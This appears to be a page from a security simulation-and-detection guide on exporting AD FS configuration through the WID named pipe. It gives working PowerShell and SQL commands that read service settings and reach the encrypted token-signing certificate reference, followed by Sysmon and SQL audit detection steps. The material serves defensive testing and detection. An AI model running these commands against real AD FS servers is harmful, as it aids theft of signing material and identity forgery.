Export AD FS Configuration via a Local Named Pipe#

Locally, the AD FS WID does not have its own management user interface (UI), but one could connect to it via a specific named pipe. Depending on the WID version, one could use the following named pipes to connect to the AD FS database and query its configuration settings:

  • WID 2008: \\.\pipe\MSSQL$MICROSOFT##SSEE\sql\query

  • WID 2012+: \\.\pipe\MICROSOFT##WID\tsql\query

Preconditions#

  • Integrity level: medium

  • Authorization:

    • Resource: AD FS Database

    • Identity:

      • AD FS Service Account

      • Local Administrator

  • AD FS Server

    • Services:

      • Active Directory Federation Services (ADFSSRV)

Simulation Steps#

Get Database Connection String via WMI Class#

The named pipe information can be obtained directly from the ConfigurationDatabaseConnectionString property of the SecurityTokenService class from the WMI ADFS namespace.

  1. Connect to the AD FS server via the Azure Bastion service as the AD FS service account.

  2. Open PowerShell and run the following commands:

$ADFS = Get-WmiObject -Namespace root/ADFS -Class SecurityTokenService
$conn = $ADFS.ConfigurationDatabaseConnectionString
$conn

Connect to the Database and Read Configuration#

  1. Use the connection string to connect to the AD FS database (WID) and run a SQL SELECT statement to export its configuration settings from the IdentityServerPolicy.ServiceSettings table.

$SQLclient = new-object System.Data.SqlClient.SqlConnection -ArgumentList $conn
$SQLclient.Open()
$SQLcmd = $SQLclient.CreateCommand()
$SQLcmd.CommandText = "SELECT ServiceSettingsData from IdentityServerPolicy.ServiceSettings"
$SQLreader = $SQLcmd.ExecuteReader()
$SQLreader.Read() | Out-Null
$settings=$SQLreader.GetTextReader(0).ReadToEnd()
$SQLreader.Dispose()
$settings

You can also parse it as an XML object

[xml]$settingsXML = $settings
$settingsXML

From here, you can get to the encrypted token signing certificate

$settingsXMl.ServiceSettingsData.SecurityTokenService.AdditionalSigningTokens.CertificateReference

Detection#

Detect Named Pipe Connection#

The connection to the AD FS database occurs via the \\.\pipe\microsoft##wid\tsql\query named pipe, and we could monitor for the connection to it with Sysmon Event ID 18 (Pipe Connected).

Azure Sentinel Detection Rules#

Detect AD FS SQL Statement to Export Service Settings#

If we want to monitor for anyone interacting with the WID database via SQL statements, we would need to create a server audit and database audit specification. We can use the Microsot SQL Server PowerShell module to connect to the database and create audit rules.

Create SQL Audit Rules:

  1. On the AD FS server (ADFS01), open PowerShell as Administrator.

  2. Install the SqlServer PowerShell Module.

Install-Module -Name SqlServer
Import-module SqlServer
  1. Create SQL Audit Rules.

Invoke-SqlCmd -ServerInstance '\\.\pipe\microsoft##wid\tsql\query' -Query "
USE [master]
GO
CREATE SERVER AUDIT [ADFS_AUDIT_APPLICATION_LOG] TO APPLICATION_LOG WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE)
GO
ALTER SERVER AUDIT [ADFS_AUDIT_APPLICATION_LOG] WITH (STATE = ON)
GO
USE [ADFSConfigurationV4]
GO
CREATE DATABASE AUDIT SPECIFICATION [ADFS_SETTINGS_ACCESS_AUDIT] FOR SERVER AUDIT [ADFS_AUDIT_APPLICATION_LOG] ADD (SELECT, UPDATE ON OBJECT::[IdentityServerPolicy].[ServiceSettings] BY [public])
GO
ALTER DATABASE AUDIT SPECIFICATION [ADFS_SETTINGS_ACCESS_AUDIT] WITH (STATE = ON)
GO
"
  1. Validate SQL Audit rule by running previous simulation steps either as the AD FS service account or local administrator:

Azure Sentinel Hunting Queries#

Output#

  • AD FS Configuration Settings